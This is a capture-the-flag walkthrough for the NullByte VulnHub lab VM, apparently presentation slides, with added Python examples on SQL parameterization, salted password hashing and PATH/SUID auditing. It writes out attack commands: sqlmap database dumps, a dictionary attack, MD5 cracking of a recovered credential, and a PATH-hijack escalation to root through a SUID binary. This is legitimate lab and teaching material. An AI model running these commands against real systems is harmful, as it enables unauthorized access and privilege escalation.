This is a presentation on exploiting the Null Byte VM. Null Byte VM is a vulnerable VM available on VulnHub. In this presentation I exploit the VM with various tools available on Kali Linux and then escalate privileges to become root. In this CTF challenge we have to find a flag, i.e. proof.txt.
ABOUT ME
Devansh Dubey
Volunteer at NULL Bhopal
Undergoing graduation from UIT RGPV
Cyber Security enthusiast
Twitter handle: @devanshdubey97
About Null Byte VM
• Name: NullByte: 1
• Codename: NB0x01
• Date release: 1 Aug 2015
• Author: ly0n
• Series: NullByte
• Web page: http://ly0n.me/2015/08/01/nullbyte-challenge-0x01/?
• Download: ly0n.me/nullbyte/NullByte.ova.zip
• Objective: Get to /root/proof.txt and follow the instructions.
• Level: Basic to intermediate.
• Description: Boot2root, box will get IP from dhcp, works fine with virtualbox & vmware.
• Operating System: Linux
Our Agenda:
• Network scanning (Nmap, netdiscover)
• Extracting hidden text from an image served by the target IP (ExifTool)
• Dictionary attack using rockyou.txt (Burp Suite) to obtain the key
• Obtaining database information via sqlmap
• Logging in to SSH on port 777
• Finding SUID binaries
• Privilege escalation by manipulating $PATH
• Getting root access and capturing the flag (proof.txt)
LET'S BEGIN
1. Netdiscover:
Netdiscover is an ARP scanner that finds live hosts in a network range.
In the first step we will find the target. We will use netdiscover, a
command-line tool in Kali Linux, to find the target:
• netdiscover -r 172.16.219.0/24
2. Nmap Scan
• Our target is 172.16.219.142; we will scan it using nmap.
• nmap -A 172.16.219.142
-A: enables OS detection, version detection, script scanning and traceroute.
• From the scan we learn that ports 80, 111, 777 and 44607 are open and that the SSH
service has been moved from port 22 to port 777. Now we will open the target IP in the
browser.
3. Exiftool:
The page shows an image and a quote. We will find nothing useful on the page or in its source, so data
may be hidden in the image itself. To see the hidden data we will use exiftool, an open-source tool available on GitHub.
Available on: https://github.com/exiftool/exiftool
In the image metadata you will find a comment, kzMb5nVYJw. This might be a directory name, so let's open it in the browser. On opening
it, we will see a text field which requires a KEY.
4. Dictionary Attack
• It is asking for a key. Since it is a text field we will use a dictionary
attack to find the key using Burp Suite and rockyou.txt (rockyou.txt
is a wordlist file available in the /usr/share/wordlists directory). Through
the dictionary attack, we will find the key, i.e. elite.
5. Using sqlmap:
• Through the dictionary attack we found the key, i.e. elite. After entering the key
in the text field, a new web page opens which asks for a
username, but so far we do not know the username. So we will find it in the
database using sqlmap.
• sqlmap -u "http://172.16.219.142/kzMb5nVYJw/420search.php?usrtosearch=1" --dbs --batch
--batch: never ask for user input, use the default behaviour.
--dbs: enumerate the databases.
It will give you the names of the databases,
i.e. information_schema, mysql, performance_schema, seth.
6. Now we will find the tables and columns, and for
that type:
• sqlmap -u "http://172.16.219.142/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth --dump-all --batch
• -D seth: select the seth database.
• --dump-all: dump all table entries.
• Once the command executes, it will show you the table name along with the columns and
the password, as shown:
Now we know the username is ramses, and the password is stored in encoded form (the next step shows it is a base64-encoded MD5 hash).
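The 420search.php page can be dumped by sqlmap because the value of usrtosearch ends up inside the query text. The following Python example is added here and is not the VM's code or the author's: it uses an in-memory SQLite table with an assumed schema (users with user and pass columns, constructed sample rows, placeholder hashes) to show the string-built lookup beside the parameterized one, and runs the same input through both.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the VM's seth database; schema and rows are assumptions."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, pass TEXT)")
    conn.executemany(
        "INSERT INTO users (user, pass) VALUES (?, ?)",
        [("ramses", "<constructed-hash-1>"), ("isis", "<constructed-hash-2>")],
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, usrtosearch: str) -> list:
    """String concatenation: the parameter becomes part of the SQL grammar,
    so quote characters in it change what the statement means."""
    sql = "SELECT user, pass FROM users WHERE user LIKE '%" + usrtosearch + "%'"
    return conn.execute(sql).fetchall()


def search_hardened(conn: sqlite3.Connection, usrtosearch: str) -> list:
    """Bound parameter: the driver passes the value separately from the statement,
    so the same input is only ever a LIKE pattern, never SQL."""
    sql = "SELECT user, pass FROM users WHERE user LIKE ?"
    return conn.execute(sql, ("%" + usrtosearch + "%",)).fetchall()


if __name__ == "__main__":
    conn = build_demo_db()
    probe = "%' OR '1'='1"  # constructed input that rewrites the WHERE clause
    print("vulnerable:", search_vulnerable(conn, probe))  # every row
    print("hardened:  ", search_hardened(conn, probe))    # no row matches the literal pattern
```

The hardened variant still does the wildcard search the page's form offers; the only difference is that the user-supplied text travels as a bound value, which is the fix for the class of issue sqlmap exploits here.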
7. Password decoding:
• Now we have the username and the password, but the password is not stored in plain text,
so we need to crack it, and there are many online tools to do so.
• First decode it from base64:
• $ echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=" | base64 -d
• The result is an MD5 hash. To crack it, go to md5decoder.org, paste the MD5 value there
and click OK; it will show you the original word, i.e. omega.
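The reason the online lookup works is that the stored value is only base64 around an unsalted MD5 digest, so every user with the password omega gets the identical string. This added Python example (not from the page or the VM) reproduces the decoding step with the page's value, checks a candidate locally the way a lookup table does, and contrasts it with salted, iterated storage (PBKDF2-HMAC-SHA256, the example's choice) that gives a different record each time.

```python
import base64
import hashlib
import hmac
import os

# Value taken from the page: the stored credential for the user ramses.
STORED = "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE="


def decode_stored(value: str) -> str:
    """Base64 is an encoding, not encryption: it is reversed without any key."""
    return base64.b64decode(value).decode("ascii")


def is_md5_hex(text: str) -> bool:
    """An MD5 digest printed as hex is exactly 32 hex characters."""
    return len(text) == 32 and all(c in "0123456789abcdef" for c in text)


def matches_md5(md5_hex: str, candidate: str) -> bool:
    """Unsalted MD5 maps a password to one fixed value, so a precomputed table
    (what md5decoder.org consults) or a quick recompute recovers it."""
    digest = hashlib.md5(candidate.encode()).hexdigest()
    return hmac.compare_digest(digest, md5_hex)


def store_password(password: str, iterations: int = 200_000) -> str:
    """Defensive counterpart: random per-user salt plus a slow, iterated KDF.
    Record format is this example's own: algo$iterations$salt_hex$dk_hex."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(record: str, candidate: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    _algo, iters, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    md5_hex = decode_stored(STORED)
    print("decoded:", md5_hex, "looks like MD5:", is_md5_hex(md5_hex))
    print("omega matches:", matches_md5(md5_hex, "omega"))
    rec1, rec2 = store_password("omega"), store_password("omega")
    print("salted records differ:", rec1 != rec2, "verify:", verify_password(rec1, "omega"))
```

Because the salt is random, two users with the same password no longer share a record, and the iteration count makes each guess far more expensive than a single MD5 call.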
8. Login through SSH
Now we will log in via SSH, and for that type:
• ssh ramses@172.16.219.142 -p 777
• After that, give omega as the password. Once we are logged in, the
following command enumerates all binaries that have the SUID
bit set:
• find / -perm -u=s -type f 2>/dev/null
• Here we find that the SUID bit is enabled on
/var/www/backup/procwatch
9. Privilege Escalation
• cd /var/www/backup/
• ./procwatch
Procwatch is a security monitor written in Perl that watches the /proc filesystem for
new processes. When a process is created, procwatch reports the time, the
username, the PID and the binary that was run. Its output is suitable for logging to
log files and is geared towards system administrators who are testing a new but as yet
untrusted UNIX system.
procwatch is owned by root and has the SUID bit set, which means the file runs with root privileges.
10. Privilege Escalation
• echo "/bin/sh" > ps
• chmod 777 ps
• echo $PATH
• export PATH=.:$PATH
• echo $PATH
• ./procwatch
• Putting '.' at the front of $PATH means commands are looked up in the current directory first, so when procwatch runs ps it executes our fake ps with its root privileges. Hence on executing the id command we will find ourselves as root.
• id
• cd /root
• ls
• cat proof.txt
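The escalation above depends on two conditions an administrator can audit: a privileged program that resolves a command name through $PATH, and a $PATH that contains an entry an unprivileged user controls. As a defensive counterpart, here is an added Python audit script (not from the page or the VM) that flags PATH entries of that kind (the leading '.' the slide adds, empty entries, relative directories, and world-writable directories without the sticky bit) and lists SUID regular files in the same spirit as the slide's find command. The function names and the reason strings are this example's own.

```python
import os
import stat


def insecure_path_entries(path_value: str, check_fs: bool = True) -> list:
    """Return (entry, reason) pairs for PATH entries that let a local user
    shadow a command name such as ps for any program that searches PATH."""
    findings = []
    for entry in path_value.split(":"):
        if entry in ("", "."):
            # An empty field and "." both mean "search the current directory".
            findings.append((entry, "current directory is searched"))
        elif not entry.startswith("/"):
            findings.append((entry, "relative entry resolves against the cwd"))
        elif check_fs and os.path.isdir(entry):
            mode = os.stat(entry).st_mode
            # World-writable without the sticky bit: anyone can drop a binary there.
            if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
                findings.append((entry, "world-writable directory"))
    return findings


def is_suid_regular(mode: int) -> bool:
    """True for a regular file whose set-user-ID bit is on (what -perm -u=s -type f selects)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_suid(root: str = "/") -> list:
    """Walk the tree under root and collect SUID regular files, skipping unreadable paths
    the way the slide's 2>/dev/null hides them."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if is_suid_regular(st.st_mode):
                hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    for entry, why in insecure_path_entries(os.environ.get("PATH", "")):
        print(f"PATH entry {entry!r}: {why}")
    # /usr keeps the demo run short; use "/" for the full sweep the slide performs.
    for path in find_suid("/usr"):
        print("SUID:", path)
```

A clean PATH report plus a short, expected SUID list is the state to aim for; any SUID file outside the distribution's own set, such as a program under /var/www, deserves a look at how it launches other commands.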